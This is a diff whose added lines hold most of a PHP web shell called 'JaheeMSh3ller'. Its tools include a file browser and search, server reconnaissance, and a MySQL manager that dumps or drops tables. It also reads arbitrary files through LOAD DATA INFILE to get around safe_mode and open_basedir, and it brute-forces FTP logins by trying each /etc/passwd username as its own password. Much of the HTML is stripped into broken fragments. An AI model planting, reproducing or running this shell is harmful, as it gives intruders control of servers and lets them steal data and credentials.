+ $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + mysql_free_result($result); + return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo ""; + if ($tbl_struct) + { + echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":



     
    Fields:
    "; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» ".$name."
    ";} + echo "
    "; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} +} +} +if (!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { + "METHOD"=>array(output_type), + "METHOD1"... + ... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return FALSE;} +} +} +if (!function_exists("N3tfsearch")) +{ +function N3tfsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== FALSE) + { + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {N3tfsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +@ob_start(); +@ob_implicit_flush(0); +function onphpshutdown() +{ + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } +} +function N3tshexit() +{ + onphpshutdown(); + exit; +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", FALSE); +header("Pragma: no-cache"); +if (empty($tmpdir)) +{ + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} +} +$tmpdir = realpath($tmpdir); +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = TRUE; + $hsafemode = "ON (secure)"; +} +else {$safemode = FALSE; $hsafemode = "OFF (no secure)";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "".$v."";} +else {$openbasedir = FALSE; $hopenbasedir = "OFF (not secure)";} +$sort = htmlspecialchars($sort); +if (empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?> +<?php echo getenv("HTTP_HOST"); ?> - JaheeMSh3ller +

    !JaheeM v. !

    Software:  

    uname -a: ",1); ?> 

    ",1);} else {echo get_current_user();} ?> 

    Safe-mode: 

    ".htmlspecialchars($b).DIRECTORY_SEPARATOR.""; + $i++; +} +echo "   "; +if (is_writable($d)) +{ + $wd = TRUE; + $wdt = "[ ok ]"; + echo "".view_perms(fileperms($d)).""; +} +else +{ + $wd = FALSE; + $wdt = "[ Read-Only ]"; + echo "".view_perms_color($d).""; +} +if (is_callable("disk_free_space")) +{ + $free = disk_free_space($d); + $total = disk_total_space($d); + if ($free === FALSE) {$free = 0;} + if ($total === FALSE) {$total = 0;} + if ($free < 0) {$free = 0;} + if ($total < 0) {$total = 0;} + $used = $total-$free; + $free_percent = round(100/($total/$free),2); + echo "
    Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)"; +} +echo "
    "; +$letters = ""; +if ($win) +{ + $v = explode("\\",$d); + $v = $v[0]; + foreach (range("a","z") as $letter) + { + $bool = $isdiskette = in_array($letter,$safemode_diskettes); + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + $letters .= "[ "; + if ($letter.":" != $v) {$letters .= $letter;} + else {$letters .= "".$letter."";} + $letters .= " ] "; + } + } + if (!empty($letters)) {echo "Detected drives: ".$letters."
    ";} +} +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "".$item[0]."    "; + } +} +echo "


    "; +if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "
    ".$donated_html."

    ";} +echo ""; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "".$line[0]."";} + $line[] = "KILL"; + $prcs[] = $line; + echo ""; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg("",$ret)) {$ret = str_replace("","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode("",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i".trim($head[$i])."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo ""; + $line = explode("",$line); + $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); + $line[2] = intval(str_replace(" ","",$line[2]))*1024; + $prcs[] = $line; + echo ""; + } + } + } + $head[$k] = "".$head[$k]."".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "
    "; +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?>

    Attention! SQL-Manager is NOT ready module! Don't reports bugs.

    "; + if (!$sql_sock) {?>"; + } + echo "
    SQL Manager:
    "; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "
    Can't connect
    "; echo "".$err."";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "
    MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
    "; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + } + echo "
    i
  • If login is null, login is owner of process.
  • If host is null, host is localhost
  • If port is null, port is 3306 (default)
  •  Please, fill the form:
    UsernamePassword Database 
    HostPORT
    ">Home
    ".htmlspecialchars($sql_db)." ]---
    "; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
    "; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?>
    Home

    Please, select database
    "; + //Start center panel + $diplay = TRUE; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "
    There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
    "; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "
    "; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "



     
    ";} + } + if (in_array($sql_act,$acts)) + { + ?>
    Create new table:
     
    Dump DB:
    "> 
    ";} + if ($sql_act == "newtbl") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    "; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = FALSE; + echo "
    SQL-Dump:

    "; + echo "DB: 

    "; + $v = join (";",$dmptbls); + echo "Only tables (explode \";\") 1: 

    "; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "File: 

    "; + echo "Download:  

    "; + echo "Save to file:  "; + echo "



    1 - all, if empty"; + echo "
    "; + } + else + { + $diplay = TRUE; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = TRUE; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; + } + } + else {echo "Dump: nothing to do!";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "
    Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
    "; + echo "Structure ]   "; + echo "Browse ]   "; + echo "Dump ]   "; + echo "Insert ]   "; + if ($sql_tbl_act == "structure") {echo "

    Coming sooon!";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "

    Inserting row into table:
    "; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("

    ".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "
    "; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo ""; + $i++; + } + echo "
    FieldTypeFunctionValue
    ".htmlspecialchars($name)."".$field["Type"]."

    "; + echo "Insert as new row"; + if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";} + echo "

    "; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "
    "; + echo "\"Pages\" "; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "
    ";} + else {echo " ";} + } + if ($i == 0) {echo "empty";} + echo "
    From:  To:  
    "; + echo "
    "; + echo ""; + echo ""; + for ($i=0;$i"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "".$v."";} + else {echo "".$v."\"".$m."\"";} + echo ""; + } + echo ""; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo ""; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo ""; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "NULL";} + echo ""; + $i++; + } + echo ""; + echo ""; + } + mysql_free_result($result); + echo "
    Action
    ".$v.""; + echo "\"Delete\" "; + echo "\"Edit\" "; + echo "

     

    "; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "
    "; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i++; + } + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
    Table
    RowsTypeCreatedModifiedSizeAction
     ".$row["Name"]." ".$row["Rows"]."".$row["Type"]."".$row["Create_time"]."".$row["Update_time"]."".$size." \"Empty\"  \"Drop\" \"Insert\" 
    »
    ".$i." table(s)
    ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

     

    "; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?>
    Create new DB:
     
    View File:
     
    "; + if ($sql_act == "newdb") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason:
    ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "
    Server-status variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "
    Server variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "
    Processes:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} + echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    "; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = FALSE; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "Error in reading file (permision denied)!";} + else + { + for ($i=0;$iFile \"".$sql_getfile."\" does not exists or empty!
    ";} + else {echo "File \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f))."
    ";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "
    "; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "
    Affected rows: ".$affected."
    "; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} + elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";} + echo "

    "; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "Ftp Quick brute:
    "; + if (!win) {echo "This functions not work in Windows!

    ";} + else + { + function N3tftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} + else {$TRUE = TRUE;} + if ($TRUE) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
    "; + ob_flush(); + return TRUE; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = FALSE;} + $fqb_log = "FTP Quick Brute (called JaheeM v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (N3tftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"
    "; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "
    Done!
    Total time (secs.): ".$ftpquick_t."
    Total connections: ".$i."
    Success.: ".$success."
    Unsuccess.:".($i-$success)."
    Connects per second: ".round($i/$ftpquick_t,2)."
